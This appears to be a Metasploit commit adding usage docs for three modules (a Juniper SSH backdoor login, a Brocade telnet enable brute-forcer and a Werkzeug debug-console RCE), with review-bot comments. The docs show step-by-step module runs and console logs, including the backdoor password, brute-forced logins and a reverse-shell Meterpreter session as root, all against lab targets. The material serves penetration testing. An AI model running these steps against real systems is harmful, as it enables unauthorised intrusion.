
Land #7165, Add documentation for juniper_backdoor, brocade_enable_login, and werkzeug_debug_rce

William Webb, 3 years ago
commit a48487578c

documentation/modules/auxiliary/scanner/ssh/juniper_backdoor.md (+33, -0)

@@ -0,0 +1,33 @@
1
+## Vulnerable Application
2
+
3
+  Juniper JunOS between 6.2.0r15 to 6.2.0r18 and 6.3.0r12 to 6.3.0r20 are vulnerable.
4
+  
5
+  A vulnerable copy of the firmware is available for a Juiper SSG5/SSG20 (v6.3.0r19.0): [here](https://github.com/h00die/MSF-Testing-Scripts/tree/master/juniper_firmware)
6
+
7
+  For verification puposes, an example vuln python script is also available [here](https://github.com/h00die/MSF-Testing-Scripts)
8
+
9
+## Verification Steps
10
+
11
+  1. Install the application
12
+  2. Start msfconsole
13
+  3. Do: ` use auxiliary/scanner/ssh/juniper_backdoor`
14
+  4. Do: `set rhosts`
15
+  5. Do: `run`
16
+  6. You should see: `[+] 192.168.1.1:22 - Logged in with backdoor account admin:<<< %s(un='%s') = %u`
17
+
18
+## Scenarios
19
+
20
+  Example run against a Juniper SSG5 with vuln firmware from above link.
21
+
22
+```
23
+msf > use auxiliary/scanner/ssh/juniper_backdoor
24
+msf auxiliary(juniper_backdoor) > set rhosts 192.168.1.1
25
+rhosts => 192.168.1.1
26
+msf auxiliary(juniper_backdoor) > set verbose true
27
+verbose => true
28
+msf auxiliary(juniper_backdoor) > run
29
+
30
+[+] 192.168.1.1:22 - Logged in with backdoor account admin:<<< %s(un='%s') = %u
31
+[*] Scanned 1 of 1 hosts (100% complete)
32
+[*] Auxiliary module execution completed
33
+```
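Review bot: line 3 names "Juniper JunOS", but the firmware linked on line 5 is for an SSG5/SSG20, which runs ScreenOS, and the 6.2.0rNN/6.3.0rNN numbering is ScreenOS release numbering; please confirm the product name, and rewrite "between 6.2.0r15 to 6.2.0r18" as "6.2.0r15 through 6.2.0r18 and 6.3.0r12 through 6.3.0r20". Also fix the typos "Juiper" (line 5) and "puposes" (line 7), drop the stray leading space inside the backticks on line 13, and give step 4 the same placeholder form the other docs use: `set rhosts <ip>`.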

documentation/modules/auxiliary/scanner/telnet/brocade_enable_login.md (+242, -0)

@@ -0,0 +1,242 @@
1
+## Vulnerable Application
2
+
3
+  This module is a login bruteforcer against Brocade network device's `enable` feature.
4
+  
5
+To configure the device in a vulnerable fashion, follow these steps:
6
+  1. Set authentication mode via: `aaa authentication enable default local`
7
+
8
+This module works against `enable` so we want to ensure telnet itself has no auth
9
+  **The following should not be set**: `enable telnet authentication`
10
+  
11
+This module has been verified against:
12
+  1. ICX6450-24 SWver 07.4.00bT311
13
+  2. FastIron WS 624 SWver 07.2.02fT7e1
14
+
15
+An emulator is available [here](https://github.com/h00die/MSF-Testing-Scripts/blob/master/brocade_emulator.py)
16
+
17
+## Verification Steps
18
+
19
+  1. Install the emulator or device
20
+  2. Start msfconsole
21
+  3. Do: `use auxiliary/scanner/telnet/brocade_enable_login`
22
+  4. Create/set a password file: `set pass_file /<passwords.lst>`
23
+  5. If desired: `set user_as_pass true`
24
+  6. Do: `set rhosts <ip>`
25
+  7. Do: `run`
26
+  8. You should get a shell.
27
+
28
+## Scenarios
29
+
30
+  Example run against ICX6450-24 SWver 07.4.00bT311
31
+
32
+```
33
+msf > use auxiliary/scanner/telnet/brocade_enable_login 
34
+msf auxiliary(brocade_enable_login) > set pass_file /passwords.lst
35
+pass_file => /passwords.lst
36
+msf auxiliary(brocade_enable_login) > set user_as_pass true
37
+user_as_pass => true
38
+msf auxiliary(brocade_enable_login) > set rhosts 192.168.50.1
39
+rhosts => 192.168.50.1
40
+msf auxiliary(brocade_enable_login) > run
41
+
42
+[*]  Attempting username gathering from config on 192.168.50.1
43
+[*]    Found: admin@192.168.50.1
44
+[*]    Found: read@192.168.50.1
45
+[*]    Found: port@192.168.50.1
46
+[*]  Attempting username gathering from running-config on 192.168.50.1
47
+[*]    Found: admin@192.168.50.1
48
+[*]    Found: read@192.168.50.1
49
+[*]    Found: port@192.168.50.1
50
+[+] 192.168.50.1:23 - LOGIN SUCCESSFUL: admin:admin
51
+[*] Attempting to start session 192.168.50.1:23 with admin:admin
52
+[*] Command shell session 1 opened (192.168.50.2:57524 -> 192.168.50.1:23) at 2015-03-06 20:19:41 -0500
53
+[-] 192.168.50.1:23 - LOGIN FAILED: read:admin (Incorrect: )
54
+[+] 192.168.50.1:23 - LOGIN SUCCESSFUL: read:read
55
+[*] Attempting to start session 192.168.50.1:23 with read:read
56
+[*] Command shell session 2 opened (192.168.50.2:49223 -> 192.168.50.1:23) at 2015-03-06 20:20:32 -0500
57
+[-] 192.168.50.1:23 - LOGIN FAILED: port:read (Incorrect: )
58
+[+] 192.168.50.1:23 - LOGIN SUCCESSFUL: port:port
59
+[*] Attempting to start session 192.168.50.1:23 with port:port
60
+[*] Command shell session 3 opened (192.168.50.2:34683 -> 192.168.50.1:23) at 2015-03-06 20:21:23 -0500
61
+[-] 192.168.50.1:23 - LOGIN FAILED: admin:port (Unable to Connect: )
62
+[-] 192.168.50.1:23 - LOGIN FAILED: admin:admin (Unable to Connect: )
63
+[-] 192.168.50.1:23 - LOGIN FAILED: admin:12345678 (Unable to Connect: )
64
+[-] 192.168.50.1:23 - LOGIN FAILED: read:port (Unable to Connect: )
65
+[-] 192.168.50.1:23 - LOGIN FAILED: read:read (Unable to Connect: )
66
+[-] 192.168.50.1:23 - LOGIN FAILED: read:12345678 (Unable to Connect: )
67
+[-] 192.168.50.1:23 - LOGIN FAILED: port:port (Unable to Connect: )
68
+[-] 192.168.50.1:23 - LOGIN FAILED: port:port (Unable to Connect: )
69
+[-] 192.168.50.1:23 - LOGIN FAILED: port:12345678 (Unable to Connect: )
70
+[*] Scanned 1 of 1 hosts (100% complete)
71
+[*] Auxiliary module execution completed
72
+msf auxiliary(brocade_enable_login) > sessions -l
73
+
74
+Active sessions
75
+===============
76
+
77
+  Id  Type    Information                           Connection
78
+  --  ----    -----------                           ----------
79
+  1   shell   TELNET admin:admin (192.168.50.1:23)  192.168.50.2:57524 -> 192.168.50.1:23 (192.168.50.1)
80
+  2   shell   TELNET read:read (192.168.50.1:23)    192.168.50.2:49223 -> 192.168.50.1:23 (192.168.50.1)
81
+  3   shell   TELNET port:port (192.168.50.1:23)    192.168.50.2:34683 -> 192.168.50.1:23 (192.168.50.1)
82
+
83
+msf auxiliary(brocade_enable_login) > session -i 1
84
+[-] Unknown command: session.
85
+msf auxiliary(brocade_enable_login) > sessions -i 1
86
+[*] Starting interaction with 1...
87
+
88
+show sessions ?
89
+Unrecognized command
90
+BR-telnet@FWS624 Router#show ?
91
+  802-1w                 Rapid Spanning tree IEEE 802.1w D10 status
92
+  aaa                    Show TACACS+ and RADIUS server statistics
93
+  access-list            show IPv4 access-list information
94
+  acl-on-arp             Show ARP ACL filtering
95
+  arp                    Arp table
96
+  auth-mac-addresses     MAC Authentication status
97
+  batch                  Batch commands
98
+  boot-preference        System boot preference
99
+  buffer-profile         Displays active profile
100
+  cable-diagnostics      Show Cable Diagnostics
101
+  chassis                Power supply/fan/temperature
102
+  clock                  System time and date
103
+  configuration          Configuration data in startup config file
104
+  cpu-utilization        CPU utilization rate
105
+  debug                  Debug information
106
+  default                System default settings
107
+  dot1x                  Dot1x information
108
+  errdisable             Errdisable status
109
+  fdp                    CDP/FDP information
110
+  flash                  Flash memory contents
111
+  gvrp                   GVRP information
112
+  inline                 inline power information
113
+  interfaces             Port status
114
+--More--, next page: Space, next line: Return key, quit: Control-c 
115
+  ip                     IP address setting
116
+  ipv6                   IP setting
117
+  license                Show license information
118
+  link-aggregate         802.3ad Link Aggregation Information
119
+  link-error-disable     Link Debouncing Control
120
+  link-keepalive         Link Layer Keepalive
121
+  lldp                   Link-Layer Discovery Protocol information
122
+  local-userdb           Local User Database information
123
+  logging                System log
124
+  loop-detection         loop detection status & disabled ports
125
+  mac-address            MAC address table
126
+  media                  1Gig/10G port media type
127
+  memory                 System memory usage
128
+  metro-ring             Metro ring protocol information
129
+  mirror                 Mirror ports
130
+  module                 Module type and status
131
+  monitor                Monitor ports
132
+  mstp                   show MSTP (IEEE 802.1s) information
133
+  optic                  Optic Temperature and Power
134
+  port                   Show port security
135
+  priority-mapping       802.1Q tagged priority setting
136
+  processes              Active process statistics
137
+  protected-link-group   Show Protected Link Group Details
138
+--More--, next page: Space, next line: Return key, quit: Control-c 
139
+  ptrace                 Global ptrace information
140
+  qd-buffer-profile      User configured buffer/descriptor profiles
141
+  qos-profiles           QOS configuration
142
+  qos-tos                IPv4 ToS based QoS
143
+  radius                 show radius server debug info
144
+  rate-limit             Rate-limiting table and actions
145
+  redundancy             Display management redundancy details
146
+  relative-utilization   Relative utilization list
147
+  reload                 Scheduled system reset
148
+  reserved-vlan-map      Reserved VLAN map status
149
+  rmon                   Rmon status
150
+  running-config         Current running-config
151
+  scheduler-profile      User configured scheduling profiles
152
+  sflow                  sFlow information
153
+  snmp                   SNMP statistics
154
+  sntp                   Show SNTP
155
+  span                   Spanning tree status
156
+  statistics             Packet statistics
157
+  stp-bpdu-guard         BPDU Guard status
158
+  stp-group              Spanning Tree Group Membership
159
+  stp-protect-ports      Show stp-protect enabled ports and their BPDU drop
160
+                         counters
161
+  table-mac-vlan         MAC Based VLAN status
162
+--More--, next page: Space, next line: Return key, quit: Control-c 
163
+  tech-support           System snap shot for tech support
164
+  telnet                 Telnet connection
165
+  topology-group         Topology Group Membership
166
+  traffic-policy         Show traffic policy definition
167
+  trunk                  Show trunk status
168
+  users                  User accounts
169
+  v6-l4-acl-sessions     Show IPv6 software sessions
170
+  version                System status
171
+  vlan                   VLAN status
172
+  vlan-group             VLAN Group Membership
173
+  voice-vlan             Show voice vlan
174
+  vsrp                   Show VSRP commands
175
+  web-connection         Current web connections
176
+  webauth                web authentication information
177
+  who                    User login
178
+  |                      Output modifiers
179
+  <cr>
180
+BR-telnet@FWS624 Router#
181
+```
182
+
183
+  Example run against emulator mentioned above:
184
+
185
+```
186
+msf > use auxiliary/scanner/telnet/brocade_enable_login 
187
+msf auxiliary(brocade_enable_login) > set rhosts 127.0.0.1
188
+rhosts => 127.0.0.1
189
+msf auxiliary(brocade_enable_login) > set user_as_pass true
190
+user_as_pass => true
191
+msf auxiliary(brocade_enable_login) > set pass_file /passwords.lst
192
+pass_file => /passwords.lst
193
+msf auxiliary(brocade_enable_login) > run
194
+
195
+[*]  Attempting username gathering from config on 127.0.0.1
196
+[*]    Found: username@127.0.0.1
197
+[*]    Found: ttrogdon@127.0.0.1
198
+[*]    Found: dmudd@127.0.0.1
199
+[*]  Attempting username gathering from running-config on 127.0.0.1
200
+[*]    Found: TopDogUser@127.0.0.1
201
+[-] 127.0.0.1:23 - LOGIN FAILED: username:username (Incorrect: )
202
+[-] 127.0.0.1:23 - LOGIN FAILED: username:12345678 (Incorrect: )
203
+[-] 127.0.0.1:23 - LOGIN FAILED: username:123456 (Incorrect: )
204
+[+] 127.0.0.1:23 - LOGIN SUCCESSFUL: username:password
205
+[*] Attempting to start session 127.0.0.1:23 with username:password
206
+[*] Command shell session 1 opened (127.0.0.1:60089 -> 127.0.0.1:23) at 2015-03-06 20:05:57 -0500
207
+[-] 127.0.0.1:23 - LOGIN FAILED: ttrogdon:password (Incorrect: )
208
+[+] 127.0.0.1:23 - LOGIN SUCCESSFUL: ttrogdon:ttrogdon
209
+[*] Attempting to start session 127.0.0.1:23 with ttrogdon:ttrogdon
210
+[*] Command shell session 2 opened (127.0.0.1:33204 -> 127.0.0.1:23) at 2015-03-06 20:06:47 -0500
211
+[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:ttrogdon (Incorrect: )
212
+[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:dmudd (Incorrect: )
213
+[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:12345678 (Incorrect: )
214
+[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:123456 (Incorrect: )
215
+[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:password (Incorrect: )
216
+[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:passwords (Incorrect: )
217
+[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:ports (Incorrect: )
218
+[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:admin (Incorrect: )
219
+[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:read (Incorrect: )
220
+[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:ttrogdon (Incorrect: )
221
+[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:TopDogUser (Incorrect: )
222
+[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:12345678 (Incorrect: )
223
+[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:123456 (Incorrect: )
224
+[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:password (Incorrect: )
225
+[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:passwords (Incorrect: )
226
+[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:ports (Incorrect: )
227
+[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:admin (Incorrect: )
228
+[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:read (Incorrect: )
229
+[*] Scanned 1 of 1 hosts (100% complete)
230
+[*] Auxiliary module execution completed
231
+msf auxiliary(brocade_enable_login) > sessions -l
232
+
233
+Active sessions
234
+===============
235
+
236
+  Id  Type    Information                              Connection
237
+  --  ----    -----------                              ----------
238
+  1   shell   TELNET username:password (127.0.0.1:23)  127.0.0.1:60089 -> 127.0.0.1:23 (127.0.0.1)
239
+  2   shell   TELNET ttrogdon:ttrogdon (127.0.0.1:23)  127.0.0.1:33204 -> 127.0.0.1:23 (127.0.0.1)
240
+
241
+msf auxiliary(brocade_enable_login) >
242
+```
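Review bot: line 30 announces an example run against the ICX6450-24, but the prompt captured on line 90 reads `BR-telnet@FWS624 Router#`, which matches the FastIron WS 624 listed on line 13; correct whichever one is wrong. The configuration steps on lines 5-9 are a one-item numbered list followed by an unindented sentence and a bold warning; merge them into a single list, e.g. "1. Set authentication mode via: `aaa authentication enable default local`" and "2. Do not set `enable telnet authentication`, so that telnet itself has no authentication in front of `enable`". The full `show ?` listing on lines 90-180 says nothing about the module and could be cut down to the prompt and a single command. Minor: "device's" on line 3 should be "devices'", and the trailing whitespace after `brocade_enable_login` on lines 33 and 186 should go.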

documentation/modules/exploit/multi/http/werkzeug_debug_rce.md (+72, -0)

@@ -0,0 +1,72 @@
1
+## Vulnerable Application
2
+
3
+Verified against:
4
+  + 0.9.6 on Debian
5
+  + 0.9.6 on Centos
6
+  + 0.10 on Debian
7
+  
8
+A sample application which enables the console debugger is available [here](https://github.com/h00die/MSF-Testing-Scripts/blob/master/werkzeug_console.py)
9
+
10
+## Verification Steps
11
+
12
+  1. Install the application
13
+  2. Start msfconsole
14
+  3. Do: `use exploit/multi/http/werkzeug_debug_rce`
15
+  4. Do: `set rport <port>`
16
+  5. Do: `set rhost <ip>`
17
+  6. Do: `check`
18
+```
19
+[+] 10.108.106.201:8081 - The target is vulnerable.
20
+```
21
+  7. Do: `set payload python/meterpreter/reverse_tcp`
22
+  8. Do: `set lhost <ip>`
23
+  9. Do: `exploit`
24
+  10. You should get a shell.
25
+
26
+## Options
27
+
28
+  **TARGETURI**
29
+
30
+  TARGETURI by default is `/console`, as defined by werkzeug, however it can be changed within the python script.
31
+
32
+## Scenarios
33
+
34
+Example utilizing the previously mentioned sample app listed above.
35
+
36
+```
37
+msf > use exploit/multi/http/werkzeug_debug_rce
38
+msf exploit(werkzeug_debug_rce) > set rport 8081
39
+rport => 8081
40
+msf exploit(werkzeug_debug_rce) > set rhost 10.108.106.201
41
+rhost => 10.108.106.201
42
+msf exploit(werkzeug_debug_rce) > check
43
+[+] 10.108.106.201:8081 - The target is vulnerable.
44
+msf exploit(werkzeug_debug_rce) > set payload python/meterpreter/reverse_tcp
45
+payload => python/meterpreter/reverse_tcp
46
+msf exploit(werkzeug_debug_rce) > set lhost 10.108.106.121
47
+lhost => 10.108.106.121
48
+msf exploit(werkzeug_debug_rce) > exploit
49
+
50
+[*] Started reverse handler on 10.108.106.121:4444
51
+[*] Sending stage (25277 bytes) to 10.108.106.201
52
+[*] Meterpreter session 2 opened (10.108.106.121:4444 -> 10.108.106.201:36720) at 2015-07-09 19:02:52 -0400
53
+
54
+meterpreter > getpid
55
+Current pid: 13034
56
+meterpreter > getuid
57
+Server username: root
58
+meterpreter > sysinfo
59
+Computer     : werkzeug
60
+OS           : Linux 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt11-1 (2015-05-24)
61
+Architecture : x86_64
62
+Meterpreter  : python/python
63
+meterpreter > shell
64
+Process 13037 created.
65
+Channel 0 created.
66
+/bin/sh: 0: can't access tty; job control turned off
67
+# ls
68
+app.py  app.pyc  werkzeug
69
+# exit
70
+meterpreter > exit
71
+[*] Shutting down Meterpreter...
72
+```
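Review bot: the "Verified against" list on lines 3-6 never names the software; write "Werkzeug 0.9.6 on Debian" (and "CentOS", line 5) so a reader knows which versions were tested. The fenced `check` output on lines 18-20 sits unindented inside the numbered list, which breaks the numbering in most Markdown renderers; indent the fence to the list items or move it after step 10. The Vulnerable Application section should also state what makes an instance exploitable, namely the Werkzeug debugger console (`/console`, line 30) being enabled and reachable over HTTP, which is exactly what the sample app on line 8 turns on. Line 30, "it can be changed within the python script", should say which script is meant (the sample app linked on line 8) and that TARGETURI must then be set to match. Line 34 repeats itself ("previously mentioned sample app listed above"); "Example run against the sample app linked above." is enough.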
